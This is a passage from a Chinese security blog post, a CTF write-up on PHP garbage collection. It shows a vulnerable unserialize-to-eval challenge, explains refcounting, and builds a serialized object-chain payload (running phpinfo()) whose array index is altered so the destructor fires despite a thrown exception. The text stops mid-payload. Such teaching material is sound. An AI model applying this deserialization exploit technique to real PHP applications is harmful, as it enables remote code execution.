<!DOCTYPE html><html lang="zh-Hans"><head><meta charset="UTF-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1"><meta name="description" content="phpGC机制"><meta name="keywords" content="websec,反序列化,phpGC机制"><meta name="author" content="uf9n1x,1916003479@qq.com"><meta name="copyright" content="uf9n1x"><title>phpGC机制 | Uf9n1x's Blog</title><link rel="shortcut icon" href="https://blog-1313934826.cos.ap-chengdu.myqcloud.com/blog-images/avator3.JPG"><link rel="stylesheet" href="/css/index.css?version=1.9.1"><link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/font-awesome@latest/css/font-awesome.min.css?version=1.9.1"><meta name="format-detection" content="telephone=no"><meta http-equiv="x-dns-prefetch-control" content="on"><link rel="dns-prefetch" href="https://cdn.jsdelivr.net"><meta http-equiv="Cache-Control" content="no-transform"><meta http-equiv="Cache-Control" content="no-siteapp"><script src="https://v1.hitokoto.cn/?encode=js&amp;charset=utf-8&amp;select=.footer_custom_text" defer></script><script>var GLOBAL_CONFIG = { 
  root: '/',
  algolia: undefined,
  localSearch: {"path":"search.xml","languages":{"hits_empty":"找不到您查询的内容:${query}"}},
  copy: {
    success: '复制成功',
    error: '复制错误',
    noSupport: '浏览器不支持'
  },
  hexoVersion: '6.3.0'
} </script><meta name="generator" content="Hexo 6.3.0">
<style>.github-emoji { position: relative; display: inline-block; width: 1.2em; min-height: 1.2em; overflow: hidden; vertical-align: top; color: transparent; }  .github-emoji > span { position: relative; z-index: 10; }  .github-emoji img, .github-emoji .fancybox { margin: 0 !important; padding: 0 !important; border: none !important; outline: none !important; text-decoration: none !important; user-select: none !important; cursor: auto !important; }  .github-emoji img { height: 1.2em !important; width: 1.2em !important; position: absolute !important; left: 50% !important; top: 50% !important; transform: translate(-50%, -50%) !important; user-select: none !important; cursor: auto !important; } .github-emoji-fallback { color: inherit; } .github-emoji-fallback img { opacity: 0 !important; }</style>
<link rel="alternate" href="/atom.xml" title="Uf9n1x's Blog" type="application/atom+xml">
<link rel="stylesheet" href="/css/prism-tomorrow.css" type="text/css">
<link rel="stylesheet" href="/css/prism-line-numbers.css" type="text/css"></head><body><canvas class="fireworks"></canvas><i class="fa fa-arrow-right" id="toggle-sidebar" aria-hidden="true"></i><div id="sidebar" data-display="true"><div class="toggle-sidebar-info text-center"><span data-toggle="切换文章详情">切换站点概览</span><hr></div><div class="sidebar-toc"><div class="sidebar-toc__title">目录</div><div class="sidebar-toc__progress"><span class="progress-notice">你已经读了</span><span class="progress-num">0</span><span class="progress-percentage">%</span><div class="sidebar-toc__progress-bar"></div></div><div class="sidebar-toc__content"><ol class="toc"><li class="toc-item toc-level-2"><a class="toc-link" href="#0x00-%E4%BE%A0%E5%AE%A2%E6%97%A5%E5%B8%B8-%E4%B8%80-%EF%BC%9ACTF%E6%B1%9F%E6%B9%96%E8%AF%95%E5%89%91"><span class="toc-number">1.</span> <span class="toc-text">0x00 侠客日常(一)：CTF江湖试剑</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#0x01-%E4%BE%A0%E5%AE%A2%E6%97%A5%E5%B8%B8-%E4%BA%8C-%EF%BC%9A%E4%BF%AE%E7%82%BC%E7%A7%98%E7%AC%88-php%E5%9E%83%E5%9C%BE%E5%9B%9E%E6%94%B6%E6%9C%BA%E5%88%B6"><span class="toc-number">2.</span> <span class="toc-text">0x01 侠客日常(二)：修炼秘笈-php垃圾回收机制</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#%E4%B8%80%E3%80%81%E5%88%9D%E7%BB%83%E7%A5%9E%E5%8A%9F"><span class="toc-number">2.1.</span> <span class="toc-text">一、初练神功</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#1-php-lt-x3D-5-2"><span class="toc-number">2.2.</span> <span class="toc-text">1. php &lt;&#x3D;5.2</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#2-php-5-3%E2%80%93-gt-5-6"><span class="toc-number">2.3.</span> <span class="toc-text">2.php 5.3–&gt;5.6</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#3-php-gt-x3D-7-0"><span class="toc-number">2.4.</span> <span class="toc-text">3.php&gt;&#x3D;7.0</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E4%BA%8C%E3%80%81%E7%A5%9E%E5%8A%9F%E5%B0%8F%E6%88%90"><span class="toc-number">2.5.</span> <span class="toc-text">二、神功小成</span></a></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#0x02-%E4%BE%A0%E5%AE%A2%E6%97%A5%E5%B8%B8-%E4%B8%89-%EF%BC%9A%E7%89%9B%E5%88%80%E5%B0%8F%E8%AF%95"><span class="toc-number">3.</span> <span class="toc-text">0x02 侠客日常(三)：牛刀小试</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#0x03-%E4%BE%A0%E5%AE%A2%E6%97%A5%E5%B8%B8-%E5%9B%9B-%EF%BC%9A%E6%8C%91%E6%88%98%E7%BE%A4%E9%9B%84"><span class="toc-number">4.</span> <span class="toc-text">0x03 侠客日常(四)：挑战群雄</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#%E9%A2%98%E7%9B%AE%E4%B8%80%EF%BC%9ACTFShow-%E5%8D%B7%E7%8E%8B%E6%9D%AF-easy-unserialize"><span class="toc-number">4.1.</span> <span class="toc-text">题目一：CTFShow[卷王杯]easy unserialize</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E9%A2%98%E7%9B%AE%E4%BA%8C%EF%BC%9A-NSSCTF-prize-p1"><span class="toc-number">4.2.</span> <span class="toc-text">题目二：[NSSCTF]prize_p1</span></a></li></ol></li></ol></div></div><div class="author-info hide"><div class="author-info__avatar text-center"><img src="https://blog-1313934826.cos.ap-chengdu.myqcloud.com/blog-images/avator3.JPG"></div><div class="author-info__name text-center">uf9n1x</div><div class="author-info__description text-center">websec</div><div class="follow-button"><a target="_blank" rel="noopener" href="https://github.com/uf9n1x">Follow Me</a></div><hr><div class="author-info-articles"><a class="author-info-articles__archives article-meta" href="/archives"><span class="pull-left">文章</span><span class="pull-right">43</span></a><a class="author-info-articles__tags article-meta" href="/tags"><span class="pull-left">标签</span><span class="pull-right">35</span></a><a class="author-info-articles__categories article-meta" href="/categories"><span class="pull-left">分类</span><span class="pull-right">30</span></a></div><hr><div class="author-info-links"><div class="author-info-links__title text-center">Some links</div><a class="author-info-links__name text-center" target="_blank" rel="noopener" href="https://www.cnblogs.com/uf9n1x/">博客园</a><a class="author-info-links__name text-center" target="_blank" rel="noopener" href="https://www.yuque.com/uf9n1x">语雀</a><a class="author-info-links__name text-center" target="_blank" rel="noopener" href="https://music.163.com/">Music</a></div></div></div><div id="content-outer"><div id="top-container" style="background-image: url(https://blog-1313934826.cos.ap-chengdu.myqcloud.com/normal-images/psc.png#https://s1.ax1x.com/2023/04/14/p9Sd0ns.png)"><div id="page-header"><span class="pull-left"> <a id="site-name" href="/">Uf9n1x's Blog</a></span><i class="fa fa-bars toggle-menu pull-right" aria-hidden="true"></i><span class="pull-right menus">   <a class="site-page" href="/">主页</a><a class="site-page" href="/archives">归档</a><a class="site-page" href="/categories">分类</a><a class="site-page" href="/tags">标签</a><a class="site-page" href="/about">About</a></span><span class="pull-right"><a class="site-page social-icon search"><i class="fa fa-search"></i><span> 搜索</span></a></span></div><div id="post-info"><div id="post-title">phpGC机制</div><div id="post-meta"><time class="post-meta__date"><i class="fa fa-calendar" aria-hidden="true"></i> 2023-04-16</time><span class="post-meta__separator">|</span><i class="fa fa-inbox post-meta__icon" aria-hidden="true"></i><a class="post-meta__categories" href="/categories/websec/">websec</a><div class="post-meta-wordcount"><span>字数总计: </span><span class="word-count">2.1k</span><span class="post-meta__separator">|</span><span>阅读时长: 8 分钟</span></div></div></div></div><div class="layout" id="content-inner"><article id="post"><div class="article-container" id="post-content"><p>这篇文章介绍phpGC(垃圾回收)机制。</p>
<span id="more"></span>

<h2 id="0x00-侠客日常-一-：CTF江湖试剑"><a href="#0x00-侠客日常-一-：CTF江湖试剑" class="headerlink" title="0x00 侠客日常(一)：CTF江湖试剑"></a>0x00 侠客日常(一)：CTF江湖试剑</h2><p>众所周知，在php中，当对象被销毁时会自动调用__destruct()方法，同时也要知道，如果程序报错或者抛出异常，则就不会触发该魔术方法。</p>
<p>看题：</p>
<pre class="line-numbers language-php"><code class="language-php"><span class="token delimiter">&lt;?php</span> 
<span class="token function">highlight_file</span><span class="token punctuation">(</span><span class="token constant">__FILE__</span><span class="token punctuation">)</span><span class="token punctuation">;</span> 
<span class="token function">error_reporting</span><span class="token punctuation">(</span><span class="token number">0</span><span class="token punctuation">)</span><span class="token punctuation">;</span> 
<span class="token keyword">class</span> <span class="token class-name">aa</span><span class="token punctuation">{</span> 
    <span class="token keyword">public</span> <span class="token variable">$num</span><span class="token punctuation">;</span> 
    <span class="token keyword">public</span> <span class="token keyword">function</span> <span class="token function">__destruct</span><span class="token punctuation">(</span><span class="token punctuation">)</span><span class="token punctuation">{</span> 
        <span class="token keyword">echo</span> <span class="token variable">$this</span><span class="token operator">-</span><span class="token operator">></span><span class="token property">num</span><span class="token punctuation">.</span><span class="token string">"hello __destruct"</span><span class="token punctuation">;</span> 
        <span class="token punctuation">}</span> 
    <span class="token punctuation">}</span>
<span class="token keyword">class</span> <span class="token class-name">bb</span><span class="token punctuation">{</span> 
    <span class="token keyword">public</span> <span class="token variable">$string</span><span class="token punctuation">;</span> 
    <span class="token keyword">public</span> <span class="token keyword">function</span> <span class="token function">__toString</span><span class="token punctuation">(</span><span class="token punctuation">)</span> <span class="token punctuation">{</span> 
        <span class="token keyword">echo</span> <span class="token string">"hello __toString"</span><span class="token punctuation">;</span> 
        <span class="token variable">$this</span><span class="token operator">-</span><span class="token operator">></span><span class="token property">string</span><span class="token operator">-</span><span class="token operator">></span><span class="token function">flag</span><span class="token punctuation">(</span><span class="token punctuation">)</span><span class="token punctuation">;</span> 
        <span class="token punctuation">}</span> 
    <span class="token punctuation">}</span>
<span class="token keyword">class</span> <span class="token class-name">cc</span><span class="token punctuation">{</span> 
    <span class="token keyword">public</span> <span class="token variable">$cmd</span><span class="token punctuation">;</span> 
    <span class="token keyword">public</span> <span class="token keyword">function</span> <span class="token function">flag</span><span class="token punctuation">(</span><span class="token punctuation">)</span><span class="token punctuation">{</span> 
        <span class="token keyword">echo</span> <span class="token string">"hello __flag()"</span><span class="token punctuation">;</span> 
        <span class="token function">eval</span><span class="token punctuation">(</span><span class="token variable">$this</span><span class="token operator">-</span><span class="token operator">></span><span class="token property">cmd</span><span class="token punctuation">)</span><span class="token punctuation">;</span> 
    <span class="token punctuation">}</span> 
<span class="token punctuation">}</span>
<span class="token variable">$a</span><span class="token operator">=</span><span class="token function">unserialize</span><span class="token punctuation">(</span><span class="token variable">$_GET</span><span class="token punctuation">[</span><span class="token string">'code'</span><span class="token punctuation">]</span><span class="token punctuation">)</span><span class="token punctuation">;</span> 
<span class="token keyword">throw</span> <span class="token keyword">new</span> <span class="token class-name">Exception</span><span class="token punctuation">(</span><span class="token string">"Garbage collection"</span><span class="token punctuation">)</span><span class="token punctuation">;</span> 
<span class="token delimiter">?></span>
<span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span></span></code></pre>
<p>很简单的一道题：</p>
<pre class="line-numbers language-php"><code class="language-php">首先调用<span class="token function">__destruct</span><span class="token punctuation">(</span><span class="token punctuation">)</span>方法<span class="token operator">--</span><span class="token operator">></span>通过num参数触发<span class="token function">__toString</span><span class="token punctuation">(</span><span class="token punctuation">)</span>方法<span class="token operator">--</span><span class="token operator">></span>给string参数赋值，调用cc的<span class="token function">flag</span><span class="token punctuation">(</span><span class="token punctuation">)</span>方法，实现<span class="token constant">RCE</span>。
<span aria-hidden="true" class="line-numbers-rows"><span></span></span></code></pre>
<p>思路很简单，但是注意这里有拦路虎：</p>
<p>这里代码末尾<strong>做了异常抛出处理，就没法触发我们想要的__destruct()方法</strong>，此时该如何绕过它呢？</p>
<p>少侠勿慌，先练练秘笈。</p>
<h2 id="0x01-侠客日常-二-：修炼秘笈-php垃圾回收机制"><a href="#0x01-侠客日常-二-：修炼秘笈-php垃圾回收机制" class="headerlink" title="0x01 侠客日常(二)：修炼秘笈-php垃圾回收机制"></a>0x01 侠客日常(二)：修炼秘笈-php垃圾回收机制</h2><h3 id="一、初练神功"><a href="#一、初练神功" class="headerlink" title="一、初练神功"></a>一、初练神功</h3><p>要解决上面遇到的拦路虎，就不得不了解一下php的GC机制：GC全称Garbage Collection，即垃圾回收机制。</p>
<p>php中，主要采用引用计数的方式来支持垃圾回收机制。简单来说，就是引用计数为0的变量可以进行回收，腾出资源。php中的变量存在于一个叫”zval”的变量容器中，容器中包含了变量的类型和值，以及两个字节的信息：</p>
<p>一个是”is_ref”：标识变量是否是引用集合，用于分开普通变量和引用变量。</p>
<p>一个是”refcount”：用于确定指向此变量的个数，即引用的个数。</p>
<p><strong>引用计数</strong>：每个内存对象都分配一个 refcount计数器，当内存对象被变量引用时，refcount计数器+1；当变量引用撤掉后（如执行unset（）后），refcount计数器-1；当 refcount计数器=0时(<strong>数组对象为NULL</strong>)，表明内存对象没有被使用，该内存对象则进行销毁，垃圾回收完成。</p>
<p>总的来说，php的垃圾回收机制存在三个版本时期：5.2之前、5.3-5.6、7.0之后，下面分别说一说：</p>
<h3 id="1-php-lt-x3D-5-2"><a href="#1-php-lt-x3D-5-2" class="headerlink" title="1. php <=5.2"></a>1. php &lt;=5.2</h3><p>该版本及之前的垃圾回收机制就是单纯的使用<strong>引用计数</strong>方法。但是注意，当两个或多个对象互相引用形成循环，内存对象的refcount计数器并不会消减为0，也就就是说，此时这组内存对象已经没有被使用，但又不能回收，因此出现内存泄露现象。</p>
<h3 id="2-php-5-3–-gt-5-6"><a href="#2-php-5-3–-gt-5-6" class="headerlink" title="2.php 5.3–>5.6"></a>2.php 5.3–&gt;5.6</h3><p>php5.3开始，使用了新的垃圾回收机制，在 <strong>引用计数</strong> 基础上，实现了一种复杂的算法，来检测内存对象中<strong>循环引用</strong>存在，以避免内存泄露。</p>
<p>在这些版本中，PHP把那些可能是垃圾的变量容器放入根缓冲区，当根缓冲区满了之后就会启动新的垃圾回收机制。过程如下：</p>
<p><strong>如果发现一个zval容器中的refcount在增加，说明不是垃圾；</strong><br><strong>如果发现一个zval容器中的refcount在减少，如果减到了0，直接当做垃圾回收；</strong><br><strong>如果发现一个zval容器中的refcount在减少，并没有减到0，PHP会把该值放到缓冲区，当做有可能是垃圾的怀疑对象；</strong><br><strong>当缓冲区达到临界值，PHP会自动调用一个方法取遍历每一个值，如果发现是垃圾就清理。</strong></p>
<h3 id="3-php-gt-x3D-7-0"><a href="#3-php-gt-x3D-7-0" class="headerlink" title="3.php>=7.0"></a>3.php&gt;=7.0</h3><p>从PHP7的NTS版本开始，以下例程的引用将不再被计数，即 $c=$b=$a 之后 a 的引用计数也是1。</p>
<p>具体情况如下：</p>
<p><strong>1.对于null，bool，int和double的类型变量，refcount永远不会计数；</strong><br><strong>2.对于对象、资源类型，refcount计数和php5的一致；</strong><br><strong>3.对于字符串，未被引用的变量被称为“实际字符串”。而那些被引用的字符串被重复删除（即只有一个带有特定内容的被插入的字符串）并保证在请求的整个持续时间内存在，所以不需要为它们使用引用计数；如果使用了opcache，这些字符串将存在于共享内存中，在这种情况下，您不能使用引用计数（因为我们的引用计数机制是非原子的）；</strong><br><strong>4.对于数组，未引用的变量被称为“不可变数组”。其数组本身计数与php5一致，但是数组里面的每个键值对的计数，则按前面三条的规则（即如果是字符串也不在计数）；如果使用opcache，则代码中的常量数组文字将被转换为不可变数组。再次，这些生活在共享内存，因此不能使用refcounting。</strong></p>
<p>测试如下：</p>
<pre class="line-numbers language-php"><code class="language-php"><span class="token delimiter">&lt;?php</span>
<span class="token keyword">echo</span> <span class="token string">'测试字符串引用计数'</span><span class="token punctuation">;</span>
<span class="token variable">$a</span> <span class="token operator">=</span> <span class="token string">"new string"</span><span class="token punctuation">;</span>
<span class="token variable">$b</span> <span class="token operator">=</span> <span class="token variable">$a</span><span class="token punctuation">;</span>
<span class="token function">xdebug_debug_zval</span><span class="token punctuation">(</span> <span class="token string">'a'</span> <span class="token punctuation">)</span><span class="token punctuation">;</span>
<span class="token function">unset</span><span class="token punctuation">(</span> <span class="token variable">$b</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
<span class="token function">xdebug_debug_zval</span><span class="token punctuation">(</span> <span class="token string">'a'</span> <span class="token punctuation">)</span><span class="token punctuation">;</span>
<span class="token variable">$b</span> <span class="token operator">=</span> <span class="token operator">&amp;</span><span class="token variable">$a</span><span class="token punctuation">;</span>
<span class="token function">xdebug_debug_zval</span><span class="token punctuation">(</span> <span class="token string">'a'</span> <span class="token punctuation">)</span><span class="token punctuation">;</span>
<span class="token comment" spellcheck="true">// 输出：</span>
测试字符串引用计数
a<span class="token punctuation">:</span> <span class="token punctuation">(</span>refcount<span class="token operator">=</span><span class="token number">1</span><span class="token punctuation">,</span> is_ref<span class="token operator">=</span><span class="token number">0</span><span class="token punctuation">)</span><span class="token operator">=</span><span class="token string">'new string'</span>
a<span class="token punctuation">:</span> <span class="token punctuation">(</span>refcount<span class="token operator">=</span><span class="token number">1</span><span class="token punctuation">,</span> is_ref<span class="token operator">=</span><span class="token number">0</span><span class="token punctuation">)</span><span class="token operator">=</span><span class="token string">'new string'</span>
a<span class="token punctuation">:</span> <span class="token punctuation">(</span>refcount<span class="token operator">=</span><span class="token number">2</span><span class="token punctuation">,</span> is_ref<span class="token operator">=</span><span class="token number">1</span><span class="token punctuation">)</span><span class="token operator">=</span><span class="token string">'new string'</span>
<span class="token shell-comment comment"># 字符串引用，计数不变，&amp;地址引用会变</span>


<span class="token keyword">echo</span> <span class="token string">'测试数组引用计数'</span><span class="token punctuation">;</span>
<span class="token variable">$c</span> <span class="token operator">=</span> <span class="token keyword">array</span><span class="token punctuation">(</span><span class="token string">'a'</span><span class="token punctuation">,</span><span class="token string">'b'</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
<span class="token function">xdebug_debug_zval</span><span class="token punctuation">(</span> <span class="token string">'c'</span> <span class="token punctuation">)</span><span class="token punctuation">;</span>
<span class="token variable">$d</span> <span class="token operator">=</span> <span class="token variable">$c</span><span class="token punctuation">;</span>
<span class="token function">xdebug_debug_zval</span><span class="token punctuation">(</span> <span class="token string">'c'</span> <span class="token punctuation">)</span><span class="token punctuation">;</span>
<span class="token variable">$c</span><span class="token punctuation">[</span><span class="token number">2</span><span class="token punctuation">]</span><span class="token operator">=</span><span class="token string">'c'</span><span class="token punctuation">;</span>
<span class="token function">xdebug_debug_zval</span><span class="token punctuation">(</span> <span class="token string">'c'</span> <span class="token punctuation">)</span><span class="token punctuation">;</span>
<span class="token comment" spellcheck="true">// 输出：</span>
测试数组引用计数
c<span class="token punctuation">:</span> <span class="token punctuation">(</span>refcount<span class="token operator">=</span><span class="token number">2</span><span class="token punctuation">,</span> is_ref<span class="token operator">=</span><span class="token number">0</span><span class="token punctuation">)</span><span class="token operator">=</span><span class="token keyword">array</span> <span class="token punctuation">(</span><span class="token number">0</span> <span class="token operator">=</span><span class="token operator">></span> <span class="token punctuation">(</span>refcount<span class="token operator">=</span><span class="token number">1</span><span class="token punctuation">,</span> is_ref<span class="token operator">=</span><span class="token number">0</span><span class="token punctuation">)</span><span class="token operator">=</span><span class="token string">'a'</span><span class="token punctuation">,</span> <span class="token number">1</span> <span class="token operator">=</span><span class="token operator">></span> <span class="token punctuation">(</span>refcount<span class="token operator">=</span><span class="token number">1</span><span class="token punctuation">,</span> is_ref<span class="token operator">=</span><span class="token number">0</span><span class="token punctuation">)</span><span class="token operator">=</span><span class="token string">'b'</span><span class="token punctuation">)</span>
c<span class="token punctuation">:</span> <span class="token punctuation">(</span>refcount<span class="token operator">=</span><span class="token number">3</span><span class="token punctuation">,</span> is_ref<span class="token operator">=</span><span class="token number">0</span><span class="token punctuation">)</span><span class="token operator">=</span><span class="token keyword">array</span> <span class="token punctuation">(</span><span class="token number">0</span> <span class="token operator">=</span><span class="token operator">></span> <span class="token punctuation">(</span>refcount<span class="token operator">=</span><span class="token number">1</span><span class="token punctuation">,</span> is_ref<span class="token operator">=</span><span class="token number">0</span><span class="token punctuation">)</span><span class="token operator">=</span><span class="token string">'a'</span><span class="token punctuation">,</span> <span class="token number">1</span> <span class="token operator">=</span><span class="token operator">></span> <span class="token punctuation">(</span>refcount<span class="token operator">=</span><span class="token number">1</span><span class="token punctuation">,</span> is_ref<span class="token operator">=</span><span class="token number">0</span><span class="token punctuation">)</span><span class="token operator">=</span><span class="token string">'b'</span><span class="token punctuation">)</span>
c<span class="token punctuation">:</span> <span class="token punctuation">(</span>refcount<span class="token operator">=</span><span class="token number">1</span><span class="token punctuation">,</span> is_ref<span class="token operator">=</span><span class="token number">0</span><span class="token punctuation">)</span><span class="token operator">=</span><span class="token keyword">array</span> <span class="token punctuation">(</span><span class="token number">0</span> <span class="token operator">=</span><span class="token operator">></span> <span class="token punctuation">(</span>refcount<span class="token operator">=</span><span class="token number">1</span><span class="token punctuation">,</span> is_ref<span class="token operator">=</span><span class="token number">0</span><span class="token punctuation">)</span><span class="token operator">=</span><span class="token string">'a'</span><span class="token punctuation">,</span> <span class="token number">1</span> <span class="token operator">=</span><span class="token operator">></span> <span class="token punctuation">(</span>refcount<span class="token operator">=</span><span class="token number">1</span><span class="token punctuation">,</span> is_ref<span class="token operator">=</span><span class="token number">0</span><span class="token punctuation">)</span><span class="token operator">=</span><span class="token string">'b'</span><span class="token punctuation">,</span> <span class="token number">2</span> <span class="token operator">=</span><span class="token operator">></span> <span class="token punctuation">(</span>refcount<span class="token operator">=</span><span class="token number">1</span><span class="token punctuation">,</span> is_ref<span class="token operator">=</span><span class="token number">0</span><span class="token punctuation">)</span><span class="token operator">=</span><span class="token string">'c'</span><span class="token punctuation">)</span>
<span class="token shell-comment comment"># 数组引用，数组本身计数加一，但数组里的键值对不变</span>


<span class="token keyword">echo</span> <span class="token string">'测试int型计数'</span><span class="token punctuation">;</span>
<span class="token variable">$e</span> <span class="token operator">=</span> <span class="token number">1</span><span class="token punctuation">;</span>
<span class="token function">xdebug_debug_zval</span><span class="token punctuation">(</span> <span class="token string">'e'</span> <span class="token punctuation">)</span><span class="token punctuation">;</span>
<span class="token comment" spellcheck="true">// 输出</span>
测试int型计数
e<span class="token punctuation">:</span> <span class="token punctuation">(</span>refcount<span class="token operator">=</span><span class="token number">0</span><span class="token punctuation">,</span> is_ref<span class="token operator">=</span><span class="token number">0</span><span class="token punctuation">)</span><span class="token operator">=</span><span class="token number">1</span>
<span class="token shell-comment comment"># int型不计数</span>
<span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span></span></code></pre>
<h3 id="二、神功小成"><a href="#二、神功小成" class="headerlink" title="二、神功小成"></a>二、神功小成</h3><p>通过如上的介绍与实验，我们可以总结如下：</p>
<p>1.绕过该异常抛出的方法就是通过提前触发垃圾回收机制，唤醒__destruct()魔术方法。</p>
<p>2.触发垃圾回收机制的方法有：（本质即使对象引用计数归零）</p>
<p>（1）对象被unset()处理时，可以触发。</p>
<p>（2）数组对象为NULL时，可以触发。</p>
<h2 id="0x02-侠客日常-三-：牛刀小试"><a href="#0x02-侠客日常-三-：牛刀小试" class="headerlink" title="0x02 侠客日常(三)：牛刀小试"></a>0x02 侠客日常(三)：牛刀小试</h2><p>上面我们知道了，当对象为NULL时也是可以触发_destruct()的，因此我们这里的话来试一下先传值给数组，之后将第二个索引置空：先构造payload:</p>
<pre class="line-numbers language-php"><code class="language-php"><span class="token delimiter">&lt;?php</span> 
<span class="token function">highlight_file</span><span class="token punctuation">(</span><span class="token constant">__FILE__</span><span class="token punctuation">)</span><span class="token punctuation">;</span> 
<span class="token function">error_reporting</span><span class="token punctuation">(</span><span class="token number">0</span><span class="token punctuation">)</span><span class="token punctuation">;</span> 
<span class="token keyword">class</span> <span class="token class-name">aa</span><span class="token punctuation">{</span> 
    <span class="token keyword">public</span> <span class="token variable">$num</span><span class="token punctuation">;</span>
<span class="token punctuation">}</span> 
<span class="token keyword">class</span> <span class="token class-name">bb</span><span class="token punctuation">{</span> 
    <span class="token keyword">public</span> <span class="token variable">$string</span><span class="token punctuation">;</span> 
<span class="token punctuation">}</span>
<span class="token keyword">class</span> <span class="token class-name">cc</span><span class="token punctuation">{</span> 
    <span class="token keyword">public</span> <span class="token variable">$cmd</span><span class="token punctuation">;</span> 
<span class="token punctuation">}</span>
<span class="token variable">$a</span> <span class="token operator">=</span> <span class="token keyword">new</span> <span class="token class-name">aa</span><span class="token punctuation">(</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
<span class="token variable">$a</span><span class="token operator">-</span><span class="token operator">></span><span class="token property">num</span><span class="token operator">=</span><span class="token keyword">new</span> <span class="token class-name">bb</span><span class="token punctuation">(</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
<span class="token variable">$a</span><span class="token operator">-</span><span class="token operator">></span><span class="token property">num</span><span class="token operator">-</span><span class="token operator">></span><span class="token property">string</span><span class="token operator">=</span><span class="token keyword">new</span> <span class="token class-name">cc</span><span class="token punctuation">(</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
<span class="token variable">$a</span><span class="token operator">-</span><span class="token operator">></span><span class="token property">num</span><span class="token operator">-</span><span class="token operator">></span><span class="token property">string</span><span class="token operator">-</span><span class="token operator">></span><span class="token property">cmd</span><span class="token operator">=</span><span class="token string">"phpinfo();"</span><span class="token punctuation">;</span>
<span class="token variable">$b</span><span class="token operator">=</span><span class="token keyword">array</span><span class="token punctuation">(</span><span class="token variable">$a</span><span class="token punctuation">,</span><span class="token number">0</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
<span class="token keyword">echo</span> <span class="token function">serialize</span><span class="token punctuation">(</span><span class="token variable">$b</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
<span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span></span></code></pre>
<p>得到：</p>
<pre class="line-numbers language-php"><code class="language-php">a<span class="token punctuation">:</span><span class="token number">2</span><span class="token punctuation">:</span><span class="token punctuation">{</span>i<span class="token punctuation">:</span><span class="token number">0</span><span class="token punctuation">;</span>O<span class="token punctuation">:</span><span class="token number">2</span><span class="token punctuation">:</span><span class="token string">"aa"</span><span class="token punctuation">:</span><span class="token number">1</span><span class="token punctuation">:</span><span class="token punctuation">{</span>s<span class="token punctuation">:</span><span class="token number">3</span><span class="token punctuation">:</span><span class="token string">"num"</span><span class="token punctuation">;</span>O<span class="token punctuation">:</span><span class="token number">2</span><span class="token punctuation">:</span><span class="token string">"bb"</span><span class="token punctuation">:</span><span class="token number">1</span><span class="token punctuation">:</span><span class="token punctuation">{</span>s<span class="token punctuation">:</span><span class="token number">6</span><span class="token punctuation">:</span><span class="token string">"string"</span><span class="token punctuation">;</span>O<span class="token punctuation">:</span><span class="token number">2</span><span class="token punctuation">:</span><span class="token string">"cc"</span><span class="token punctuation">:</span><span class="token number">1</span><span class="token punctuation">:</span><span class="token punctuation">{</span>s<span class="token punctuation">:</span><span class="token number">3</span><span class="token punctuation">:</span><span class="token string">"cmd"</span><span class="token punctuation">;</span>s<span class="token punctuation">:</span><span class="token number">10</span><span class="token punctuation">:</span><span class="token string">"phpinfo();"</span><span class="token punctuation">;</span><span class="token punctuation">}</span><span class="token punctuation">}</span><span class="token punctuation">}</span>i<span class="token punctuation">:</span><span class="token number">1</span><span class="token punctuation">;</span>i<span class="token punctuation">:</span><span class="token number">0</span><span class="token punctuation">;</span><span class="token punctuation">}</span>
<span aria-hidden="true" class="line-numbers-rows"><span></span></span></code></pre>
<p>将<code>i:1</code>修改为<code>i:0</code>:</p>
<pre class="line-numbers language-php"><code class="language-php">a<span class="token punctuation">:</span><span class="token number">2</span><span class="token punctuation">:</span><span class="token punctuation">{</span>i<span class="token punctuation">:</span><span class="token number">0</span><span class="token punctuation">;</span>O<span class="token punctuation">:</span><span class="token number">2</span><span class="token punctuation">:</span><span class="token string">"aa"</span><span class="token punctuation">:</span><span class="token number">1</span><span class="token punctuation">:</span><span class="token punctuation">{</span>s<span class="token punctuation">:</span><span class="token number">3</span><span class="token punctuation">:</span><span class="token string">"num"</span><span class="token punctuation">;</span>O<span class="token punctuation">:</span><span class="token number">2</span><span class="token punctuation">:</span><span class="token string">"bb"</span><span class="token punctuation">:</span><span class="token number">1</span><span class="token punctuation">:</span><span class="token punctuation">{</span>s<span class="token punctuation">:</span><span class="token number">6</span><span class="token punctuation">:</span><span class="token string">"string"</span><span class="token punctuation">;</span>O<span class="token punctuation">:</span><span class="token number">2</span><span class="token punctuation">:</span><span class="token string">"cc"</span><span class="token punctuation">:</span><span class="token number">1</span><span class="token punctuation">:</span><span class="token punctuation">{</span>s<span class="token punctuation">:</span><span class="token number">3</span><span class="token punctuation">:</span><span class="token string">"cmd"</span><span class="token punctuation">;</span>s<span class="token punctuation">:</span><span class="token number">10</span><span class="token punctuation">:</span><span class="token string">"phpinfo();"</span><span class="token 